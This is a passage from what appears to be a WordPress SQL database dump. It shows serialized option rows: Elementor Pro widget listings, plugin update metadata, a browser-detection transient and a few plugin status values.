List\";s:4:\"icon\";s:16:\"eicon-price-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:9;a:4:{s:4:\"name\";s:11:\"price-table\";s:5:\"title\";s:11:\"Price Table\";s:4:\"icon\";s:17:\"eicon-price-table\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:10;a:4:{s:4:\"name\";s:8:\"flip-box\";s:5:\"title\";s:8:\"Flip Box\";s:4:\"icon\";s:14:\"eicon-flip-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:11;a:4:{s:4:\"name\";s:14:\"call-to-action\";s:5:\"title\";s:14:\"Call to Action\";s:4:\"icon\";s:20:\"eicon-image-rollover\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:12;a:4:{s:4:\"name\";s:14:\"media-carousel\";s:5:\"title\";s:14:\"Media Carousel\";s:4:\"icon\";s:20:\"eicon-media-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:13;a:4:{s:4:\"name\";s:20:\"testimonial-carousel\";s:5:\"title\";s:20:\"Testimonial Carousel\";s:4:\"icon\";s:26:\"eicon-testimonial-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:14;a:4:{s:4:\"name\";s:7:\"reviews\";s:5:\"title\";s:7:\"Reviews\";s:4:\"icon\";s:12:\"eicon-review\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:15;a:4:{s:4:\"name\";s:17:\"table-of-contents\";s:5:\"title\";s:17:\"Table of Contents\";s:4:\"icon\";s:23:\"eicon-table-of-contents\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:16;a:4:{s:4:\"name\";s:9:\"countdown\";s:5:\"title\";s:9:\"Countdown\";s:4:\"icon\";s:15:\"eicon-countdown\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:17;a:4:{s:4:\"name\";s:13:\"share-buttons\";s:5:\"title\";s:13:\"Share Buttons\";s:4:\"icon\";s:11:\"eicon-share\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:18;a:4:{s:4:\"name\";s:11:\"search-form\";s:5:\"title\";s:11:\"Search Form\";s:4:\"icon\";s:17:\"eicon-site-search\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:19;a:4:{s:4:\"name\";s:10:\"author-box\";s:5:\"title\";s:10:\"Author Box\";s:4:\"icon\";s:12:\"eicon-person\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:20;a:4:{s:4:\"name\";s:13:\"post-comments\";s:5:\"title\";s:13:\"Post Comments\";s:4:\"icon\";s:14:\"eicon-comments\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:21;a:4:{s:4:\"name\";s:15:\"post-navigation\";s:5:\"title\";s:15:\"Post Navigation\";s:4:\"icon\";s:21:\"eicon-post-navigation\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:22;a:4:{s:4:\"name\";s:9:\"post-info\";s:5:\"title\";s:9:\"Post Info\";s:4:\"icon\";s:15:\"eicon-post-info\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:23;a:4:{s:4:\"name\";s:7:\"sitemap\";s:5:\"title\";s:7:\"Sitemap\";s:4:\"icon\";s:13:\"eicon-sitemap\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:24;a:4:{s:4:\"name\";s:11:\"breadcrumbs\";s:5:\"title\";s:11:\"Breadcrumbs\";s:4:\"icon\";s:11:\"eicon-yoast\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:25;a:4:{s:4:\"name\";s:10:\"blockquote\";s:5:\"title\";s:10:\"Blockquote\";s:4:\"icon\";s:16:\"eicon-blockquote\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:26;a:4:{s:4:\"name\";s:19:\"wc-archive-products\";s:5:\"title\";s:16:\"Archive Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:27;a:4:{s:4:\"name\";s:31:\"woocommerce-archive-description\";s:5:\"title\";s:19:\"Archive Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:28;a:4:{s:4:\"name\";s:20:\"woocommerce-products\";s:5:\"title\";s:8:\"Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:29;a:4:{s:4:\"name\";s:22:\"woocommerce-breadcrumb\";s:5:\"title\";s:23:\"WooCommerce Breadcrumbs\";s:4:\"icon\";s:25:\"eicon-product-breadcrumbs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:30;a:4:{s:4:\"name\";s:14:\"wc-add-to-cart\";s:5:\"title\";s:18:\"Custom Add To Cart\";s:4:\"icon\";s:17:\"eicon-woocommerce\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:31;a:4:{s:4:\"name\";s:11:\"wc-elements\";s:5:\"title\";s:17:\"WooCommerce Pages\";s:4:\"icon\";s:19:\"eicon-product-pages\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:32;a:4:{s:4:\"name\";s:13:\"wc-categories\";s:5:\"title\";s:18:\"Product Categories\";s:4:\"icon\";s:24:\"eicon-product-categories\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:33;a:4:{s:4:\"name\";s:21:\"woocommerce-menu-cart\";s:5:\"title\";s:9:\"Menu Cart\";s:4:\"icon\";s:10:\"eicon-cart\";s:10:\"categories\";s:41:\"[\"theme-elements\",\"woocommerce-elements\"]\";}i:34;a:4:{s:4:\"name\";s:25:\"woocommerce-product-title\";s:5:\"title\";s:13:\"Product Title\";s:4:\"icon\";s:19:\"eicon-product-title\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:35;a:4:{s:4:\"name\";s:26:\"woocommerce-product-images\";s:5:\"title\";s:14:\"Product Images\";s:4:\"icon\";s:20:\"eicon-product-images\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:36;a:4:{s:4:\"name\";s:25:\"woocommerce-product-price\";s:5:\"title\";s:13:\"Product Price\";s:4:\"icon\";s:19:\"eicon-product-price\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:37;a:4:{s:4:\"name\";s:31:\"woocommerce-product-add-to-cart\";s:5:\"title\";s:11:\"Add To Cart\";s:4:\"icon\";s:25:\"eicon-product-add-to-cart\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:38;a:4:{s:4:\"name\";s:26:\"woocommerce-product-rating\";s:5:\"title\";s:14:\"Product Rating\";s:4:\"icon\";s:20:\"eicon-product-rating\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:39;a:4:{s:4:\"name\";s:25:\"woocommerce-product-stock\";s:5:\"title\";s:13:\"Product Stock\";s:4:\"icon\";s:19:\"eicon-product-stock\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:40;a:4:{s:4:\"name\";s:24:\"woocommerce-product-meta\";s:5:\"title\";s:12:\"Product Meta\";s:4:\"icon\";s:18:\"eicon-product-meta\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:41;a:4:{s:4:\"name\";s:37:\"woocommerce-product-short-description\";s:5:\"title\";s:17:\"Short Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:42;a:4:{s:4:\"name\";s:29:\"woocommerce-product-data-tabs\";s:5:\"title\";s:17:\"Product Data Tabs\";s:4:\"icon\";s:18:\"eicon-product-tabs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:43;a:4:{s:4:\"name\";s:42:\"woocommerce-product-additional-information\";s:5:\"title\";s:22:\"Additional Information\";s:4:\"icon\";s:19:\" eicon-product-info\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:44;a:4:{s:4:\"name\";s:27:\"woocommerce-product-related\";s:5:\"title\";s:15:\"Product Related\";s:4:\"icon\";s:21:\"eicon-product-related\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:45;a:4:{s:4:\"name\";s:26:\"woocommerce-product-upsell\";s:5:\"title\";s:7:\"Upsells\";s:4:\"icon\";s:20:\"eicon-product-upsell\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:46;a:4:{s:4:\"name\";s:15:\"facebook-button\";s:5:\"title\";s:15:\"Facebook Button\";s:4:\"icon\";s:23:\"eicon-facebook-like-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:47;a:4:{s:4:\"name\";s:17:\"facebook-comments\";s:5:\"title\";s:17:\"Facebook Comments\";s:4:\"icon\";s:23:\"eicon-facebook-comments\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:48;a:4:{s:4:\"name\";s:14:\"facebook-embed\";s:5:\"title\";s:14:\"Facebook Embed\";s:4:\"icon\";s:14:\"eicon-fb-embed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:49;a:4:{s:4:\"name\";s:13:\"facebook-page\";s:5:\"title\";s:13:\"Facebook Page\";s:4:\"icon\";s:13:\"eicon-fb-feed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:50;a:4:{s:4:\"name\";s:8:\"template\";s:5:\"title\";s:8:\"Template\";s:4:\"icon\";s:19:\"eicon-document-file\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:51;a:4:{s:4:\"name\";s:15:\"theme-site-logo\";s:5:\"title\";s:9:\"Site Logo\";s:4:\"icon\";s:15:\"eicon-site-logo\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:52;a:4:{s:4:\"name\";s:16:\"theme-site-title\";s:5:\"title\";s:10:\"Site Title\";s:4:\"icon\";s:16:\"eicon-site-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:53;a:4:{s:4:\"name\";s:16:\"theme-page-title\";s:5:\"title\";s:10:\"Page Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:54;a:4:{s:4:\"name\";s:16:\"theme-post-title\";s:5:\"title\";s:10:\"Post Title\";s:4:\"icon\";s:16:\"eicon-post-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:55;a:4:{s:4:\"name\";s:18:\"theme-post-excerpt\";s:5:\"title\";s:12:\"Post Excerpt\";s:4:\"icon\";s:18:\"eicon-post-excerpt\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:56;a:4:{s:4:\"name\";s:25:\"theme-post-featured-image\";s:5:\"title\";s:14:\"Featured Image\";s:4:\"icon\";s:20:\"eicon-featured-image\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:57;a:4:{s:4:\"name\";s:19:\"theme-archive-title\";s:5:\"title\";s:13:\"Archive Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:58;a:4:{s:4:\"name\";s:13:\"archive-posts\";s:5:\"title\";s:13:\"Archive Posts\";s:4:\"icon\";s:19:\"eicon-archive-posts\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}}s:17:\"canary_deployment\";a:2:{s:11:\"plugin_info\";a:11:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"3.0.0\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.0.zip\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=1427768\";s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.4\";s:12:\"requires_php\";s:3:\"5.6\";}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:3:{s:4:\"type\";s:8:\"language\";s:9:\"languages\";a:26:{i:0;s:5:\"he_IL\";i:1;s:5:\"en_GB\";i:2;s:5:\"en_NZ\";i:3;s:5:\"en_ZA\";i:4;s:5:\"en_AU\";i:5;s:5:\"en_CA\";i:6;s:5:\"sv_SE\";i:7;s:5:\"da_DK\";i:8;s:5:\"fr_FR\";i:9;s:5:\"nl_NL\";i:10;s:5:\"nb_NO\";i:11;s:5:\"de_AT\";i:12;s:2:\"fi\";i:13;s:5:\"it_IT\";i:14;s:5:\"nn_NO\";i:15;s:5:\"de_CH\";i:16;s:5:\"en_GB\";i:17;s:5:\"is_IS\";i:18;s:2:\"ga\";i:19;s:5:\"fr_BE\";i:20;s:5:\"nl_BE\";i:21;s:3:\"ast\";i:22;s:5:\"lb_LU\";i:23;s:5:\"es_ES\";i:24;s:5:\"pt_PT\";i:25;s:3:\"mlt\";}s:8:\"operator\";s:2:\"in\";}}}}}','no'),(62019,'_site_transient_timeout_browser_d3e9dc0e9af932dcf7a846ba95166ff6','1602942917','no'),(62020,'_site_transient_browser_d3e9dc0e9af932dcf7a846ba95166ff6','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"85.0.4183.121\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(62044,'wpdevart_booking_version_new','10.11','yes'),(62174,'_transient_timeout_wfcredentialstatus_1','1604085439','no'),(62175,'_transient_wfcredentialstatus_1','0f5e25a32ddd2ca0cb2184cba9534f0ab1f29369e3b1b1522ffb90263de838b1c','no'),(62178,'_transient_timeout_elementor_remote_info_api_data_3.0.11','1604125043','no'),(62179,'_transient_elementor_remote_info_api_data_3.0.11','a:4:{s:9:\"timestamp\";s:10:\"1604081022\";s:14:\"upgrade_notice\";a:3:{s:7:\"version\";s:5:\"2.0.0\";s:7:\"message\";s:0:\"\";s:11:\"update_link\";s:0:\"\";}s:11:\"pro_widgets\";a:59:{i:0;a:4:{s:4:\"name\";s:5:\"posts\";s:5:\"title\";s:5:\"Posts\";s:4:\"icon\";s:15:\"eicon-post-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:1;a:4:{s:4:\"name\";s:9:\"portfolio\";s:5:\"title\";s:9:\"Portfolio\";s:4:\"icon\";s:18:\"eicon-gallery-grid\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:2;a:4:{s:4:\"name\";s:7:\"gallery\";s:5:\"title\";s:7:\"Gallery\";s:4:\"icon\";s:23:\"eicon-gallery-justified\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:3;a:4:{s:4:\"name\";s:4:\"form\";s:5:\"title\";s:4:\"Form\";s:4:\"icon\";s:21:\"eicon-form-horizontal\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:4;a:4:{s:4:\"name\";s:5:\"login\";s:5:\"title\";s:5:\"Login\";s:4:\"icon\";s:15:\"eicon-lock-user\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:5;a:4:{s:4:\"name\";s:6:\"slides\";s:5:\"title\";s:6:\"Slides\";s:4:\"icon\";s:12:\"eicon-slides\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:6;a:4:{s:4:\"name\";s:8:\"nav-menu\";s:5:\"title\";s:8:\"Nav Menu\";s:4:\"icon\";s:14:\"eicon-nav-menu\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:7;a:4:{s:4:\"name\";s:17:\"animated-headline\";s:5:\"title\";s:17:\"Animated Headline\";s:4:\"icon\";s:23:\"eicon-animated-headline\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:8;a:4:{s:4:\"name\";s:10:\"price-list\";s:5:\"title\";s:10:\"Price List\";s:4:\"icon\";s:16:\"eicon-price-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:9;a:4:{s:4:\"name\";s:11:\"price-table\";s:5:\"title\";s:11:\"Price Table\";s:4:\"icon\";s:17:\"eicon-price-table\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:10;a:4:{s:4:\"name\";s:8:\"flip-box\";s:5:\"title\";s:8:\"Flip Box\";s:4:\"icon\";s:14:\"eicon-flip-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:11;a:4:{s:4:\"name\";s:14:\"call-to-action\";s:5:\"title\";s:14:\"Call to Action\";s:4:\"icon\";s:20:\"eicon-image-rollover\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:12;a:4:{s:4:\"name\";s:14:\"media-carousel\";s:5:\"title\";s:14:\"Media Carousel\";s:4:\"icon\";s:20:\"eicon-media-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:13;a:4:{s:4:\"name\";s:20:\"testimonial-carousel\";s:5:\"title\";s:20:\"Testimonial Carousel\";s:4:\"icon\";s:26:\"eicon-testimonial-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:14;a:4:{s:4:\"name\";s:7:\"reviews\";s:5:\"title\";s:7:\"Reviews\";s:4:\"icon\";s:12:\"eicon-review\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:15;a:4:{s:4:\"name\";s:17:\"table-of-contents\";s:5:\"title\";s:17:\"Table of Contents\";s:4:\"icon\";s:23:\"eicon-table-of-contents\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:16;a:4:{s:4:\"name\";s:9:\"countdown\";s:5:\"title\";s:9:\"Countdown\";s:4:\"icon\";s:15:\"eicon-countdown\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:17;a:4:{s:4:\"name\";s:13:\"share-buttons\";s:5:\"title\";s:13:\"Share Buttons\";s:4:\"icon\";s:11:\"eicon-share\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:18;a:4:{s:4:\"name\";s:11:\"search-form\";s:5:\"title\";s:11:\"Search Form\";s:4:\"icon\";s:17:\"eicon-site-search\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:19;a:4:{s:4:\"name\";s:10:\"author-box\";s:5:\"title\";s:10:\"Author Box\";s:4:\"icon\";s:12:\"eicon-person\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:20;a:4:{s:4:\"name\";s:13:\"post-comments\";s:5:\"title\";s:13:\"Post Comments\";s:4:\"icon\";s:14:\"eicon-comments\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:21;a:4:{s:4:\"name\";s:15:\"post-navigation\";s:5:\"title\";s:15:\"Post Navigation\";s:4:\"icon\";s:21:\"eicon-post-navigation\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:22;a:4:{s:4:\"name\";s:9:\"post-info\";s:5:\"title\";s:9:\"Post Info\";s:4:\"icon\";s:15:\"eicon-post-info\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:23;a:4:{s:4:\"name\";s:7:\"sitemap\";s:5:\"title\";s:7:\"Sitemap\";s:4:\"icon\";s:13:\"eicon-sitemap\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:24;a:4:{s:4:\"name\";s:11:\"breadcrumbs\";s:5:\"title\";s:11:\"Breadcrumbs\";s:4:\"icon\";s:11:\"eicon-yoast\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:25;a:4:{s:4:\"name\";s:10:\"blockquote\";s:5:\"title\";s:10:\"Blockquote\";s:4:\"icon\";s:16:\"eicon-blockquote\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:26;a:4:{s:4:\"name\";s:19:\"wc-archive-products\";s:5:\"title\";s:16:\"Archive Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:27;a:4:{s:4:\"name\";s:31:\"woocommerce-archive-description\";s:5:\"title\";s:19:\"Archive Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:28;a:4:{s:4:\"name\";s:20:\"woocommerce-products\";s:5:\"title\";s:8:\"Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:29;a:4:{s:4:\"name\";s:22:\"woocommerce-breadcrumb\";s:5:\"title\";s:23:\"WooCommerce Breadcrumbs\";s:4:\"icon\";s:25:\"eicon-product-breadcrumbs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:30;a:4:{s:4:\"name\";s:14:\"wc-add-to-cart\";s:5:\"title\";s:18:\"Custom Add To Cart\";s:4:\"icon\";s:17:\"eicon-woocommerce\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:31;a:4:{s:4:\"name\";s:11:\"wc-elements\";s:5:\"title\";s:17:\"WooCommerce Pages\";s:4:\"icon\";s:19:\"eicon-product-pages\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:32;a:4:{s:4:\"name\";s:13:\"wc-categories\";s:5:\"title\";s:18:\"Product Categories\";s:4:\"icon\";s:24:\"eicon-product-categories\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:33;a:4:{s:4:\"name\";s:21:\"woocommerce-menu-cart\";s:5:\"title\";s:9:\"Menu Cart\";s:4:\"icon\";s:10:\"eicon-cart\";s:10:\"categories\";s:41:\"[\"theme-elements\",\"woocommerce-elements\"]\";}i:34;a:4:{s:4:\"name\";s:25:\"woocommerce-product-title\";s:5:\"title\";s:13:\"Product Title\";s:4:\"icon\";s:19:\"eicon-product-title\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:35;a:4:{s:4:\"name\";s:26:\"woocommerce-product-images\";s:5:\"title\";s:14:\"Product Images\";s:4:\"icon\";s:20:\"eicon-product-images\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:36;a:4:{s:4:\"name\";s:25:\"woocommerce-product-price\";s:5:\"title\";s:13:\"Product Price\";s:4:\"icon\";s:19:\"eicon-product-price\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:37;a:4:{s:4:\"name\";s:31:\"woocommerce-product-add-to-cart\";s:5:\"title\";s:11:\"Add To Cart\";s:4:\"icon\";s:25:\"eicon-product-add-to-cart\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:38;a:4:{s:4:\"name\";s:26:\"woocommerce-product-rating\";s:5:\"title\";s:14:\"Product Rating\";s:4:\"icon\";s:20:\"eicon-product-rating\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:39;a:4:{s:4:\"name\";s:25:\"woocommerce-product-stock\";s:5:\"title\";s:13:\"Product Stock\";s:4:\"icon\";s:19:\"eicon-product-stock\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:40;a:4:{s:4:\"name\";s:24:\"woocommerce-product-meta\";s:5:\"title\";s:12:\"Product Meta\";s:4:\"icon\";s:18:\"eicon-product-meta\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:41;a:4:{s:4:\"name\";s:37:\"woocommerce-product-short-description\";s:5:\"title\";s:17:\"Short Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:42;a:4:{s:4:\"name\";s:29:\"woocommerce-product-data-tabs\";s:5:\"title\";s:17:\"Product Data Tabs\";s:4:\"icon\";s:18:\"eicon-product-tabs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:43;a:4:{s:4:\"name\";s:42:\"woocommerce-product-additional-information\";s:5:\"title\";s:22:\"Additional Information\";s:4:\"icon\";s:19:\" eicon-product-info\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:44;a:4:{s:4:\"name\";s:27:\"woocommerce-product-related\";s:5:\"title\";s:15:\"Product Related\";s:4:\"icon\";s:21:\"eicon-product-related\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:45;a:4:{s:4:\"name\";s:26:\"woocommerce-product-upsell\";s:5:\"title\";s:7:\"Upsells\";s:4:\"icon\";s:20:\"eicon-product-upsell\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:46;a:4:{s:4:\"name\";s:15:\"facebook-button\";s:5:\"title\";s:15:\"Facebook Button\";s:4:\"icon\";s:23:\"eicon-facebook-like-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:47;a:4:{s:4:\"name\";s:17:\"facebook-comments\";s:5:\"title\";s:17:\"Facebook Comments\";s:4:\"icon\";s:23:\"eicon-facebook-comments\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:48;a:4:{s:4:\"name\";s:14:\"facebook-embed\";s:5:\"title\";s:14:\"Facebook Embed\";s:4:\"icon\";s:14:\"eicon-fb-embed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:49;a:4:{s:4:\"name\";s:13:\"facebook-page\";s:5:\"title\";s:13:\"Facebook Page\";s:4:\"icon\";s:13:\"eicon-fb-feed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:50;a:4:{s:4:\"name\";s:8:\"template\";s:5:\"title\";s:8:\"Template\";s:4:\"icon\";s:19:\"eicon-document-file\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:51;a:4:{s:4:\"name\";s:15:\"theme-site-logo\";s:5:\"title\";s:9:\"Site Logo\";s:4:\"icon\";s:15:\"eicon-site-logo\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:52;a:4:{s:4:\"name\";s:16:\"theme-site-title\";s:5:\"title\";s:10:\"Site Title\";s:4:\"icon\";s:16:\"eicon-site-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:53;a:4:{s:4:\"name\";s:16:\"theme-page-title\";s:5:\"title\";s:10:\"Page Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:54;a:4:{s:4:\"name\";s:16:\"theme-post-title\";s:5:\"title\";s:10:\"Post Title\";s:4:\"icon\";s:16:\"eicon-post-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:55;a:4:{s:4:\"name\";s:18:\"theme-post-excerpt\";s:5:\"title\";s:12:\"Post Excerpt\";s:4:\"icon\";s:18:\"eicon-post-excerpt\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:56;a:4:{s:4:\"name\";s:25:\"theme-post-featured-image\";s:5:\"title\";s:14:\"Featured Image\";s:4:\"icon\";s:20:\"eicon-featured-image\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:57;a:4:{s:4:\"name\";s:19:\"theme-archive-title\";s:5:\"title\";s:13:\"Archive Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:58;a:4:{s:4:\"name\";s:13:\"archive-posts\";s:5:\"title\";s:13:\"Archive Posts\";s:4:\"icon\";s:19:\"eicon-archive-posts\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}}s:17:\"canary_deployment\";a:2:{s:11:\"plugin_info\";a:11:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"3.0.0\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.0.zip\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=1427768\";s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.4\";s:12:\"requires_php\";s:3:\"5.6\";}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:3:{s:4:\"type\";s:8:\"language\";s:9:\"languages\";a:26:{i:0;s:5:\"he_IL\";i:1;s:5:\"en_GB\";i:2;s:5:\"en_NZ\";i:3;s:5:\"en_ZA\";i:4;s:5:\"en_AU\";i:5;s:5:\"en_CA\";i:6;s:5:\"sv_SE\";i:7;s:5:\"da_DK\";i:8;s:5:\"fr_FR\";i:9;s:5:\"nl_NL\";i:10;s:5:\"nb_NO\";i:11;s:5:\"de_AT\";i:12;s:2:\"fi\";i:13;s:5:\"it_IT\";i:14;s:5:\"nn_NO\";i:15;s:5:\"de_CH\";i:16;s:5:\"en_GB\";i:17;s:5:\"is_IS\";i:18;s:2:\"ga\";i:19;s:5:\"fr_BE\"